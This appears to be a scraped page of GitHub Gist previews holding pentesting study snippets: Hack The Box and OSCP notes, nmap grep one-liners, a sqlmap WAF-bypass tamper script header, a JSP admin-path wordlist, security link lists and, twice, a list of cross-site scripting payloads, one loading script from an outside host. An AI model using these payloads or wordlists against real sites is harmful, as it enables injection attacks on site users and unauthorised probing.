This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
HTB_DATA_DIR=~/Documents/HTB/ | |
if [[ $1 ]]; then | |
a=1 | |
else | |
echo "Usage: $0 <Box name>" | |
exit 1 | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
""" | |
sqlmap tamper script for bypassing WAF | |
g4mm4 is my hero | |
""" | |
import re | |
import random | |
from lib.core.data import kb | |
from lib.core.enums import PRIORITY |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Pull Resolved Hosts From .gnmap Files | |
grep "Host: " *.gnmap|sed 's/\t/ /g'|tr -s '[:space:]'|cut -d" " -f3|awk '!/\(\)/'|sort -u|sed 's/(//g;s/)//g' | |
# Pull Alive Host IPs Based on Open Port From .gnmap Files | |
grep "Host:.*Ports:.*/open/" *.gnmap|cut -d" " -f2 | |
# Pull Alive Host IPs Based on Status Form .gnmap Files (Varying Results Based On Scan Flags [i.e.: -Pn]) | |
grep "Host:.*Status: Up" *.gnmap|cut -d" " -f2 | |
# Common Discovery Scan String (Known RTT) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bash,pentesting one-liners and stuff | |
Basics | |
grep case insensitive | |
grep -i "<this>" <file> | |
grep recursively | |
grep -ir "<this>" <directory> | |
grep with word match only (string starting/ending with non-word constituent character) | |
grep -wi "<this>" <file> | |
remove/delete filename from grep output | |
grep -hi "<this>" <file> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/admin/admin.js | |
/admin/appinfo.jsp | |
/admin/cache_stats.jsp | |
/admin/catalogcache.jsp | |
/admin/ccms/customizing.jsp | |
/admin/ccms/result.jsp | |
/admin/ccms/sendFailure.jsp | |
/ecall/jsp/customer/login/login.jsp | |
/ecall/jsp/customer/upload/upload.jsp | |
/user/admin/index.jsp |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#notes | |
https://www.cnblogs.com/keepmoving1113/tag/OSCP/ | |
https://hausec.com/pentesting-cheatsheet/ | |
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet | |
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md | |
https://noobsec.net/oscp-cheatsheet/ | |
https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html | |
https://www.reddit.com/r/oscp/comments/824v7z/oscp_exam_taking_fraud/ | |
https://github.com/OlivierLaflamme/Cheatsheet-God | |
https://johntuyen.com/personal/2019/05/25/personal-oscpcheatsheet.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://github.com/HolyBugx/HolyTips | |
https://www.apiopscycles.com/api-audit-checklist | |
https://github.com/inonshk/31-days-of-API-Security-Tips | |
https://github.com/shieldfy/API-Security-Checklist | |
https://web.archive.org/web/20210607123429/https://www.binarybrotherhood.io/oauth2_threat_model.html | |
https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf | |
https://cheatsheetseries.owasp.org/cheatsheets/Microservices_security.html | |
https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html | |
https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf | |
https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
curl -s "https://urlscan.io/api/v1/search/?q=domain:$1" | grep -E '"url"' | cut -d '"' -f4 | grep -F $1 | sort -u |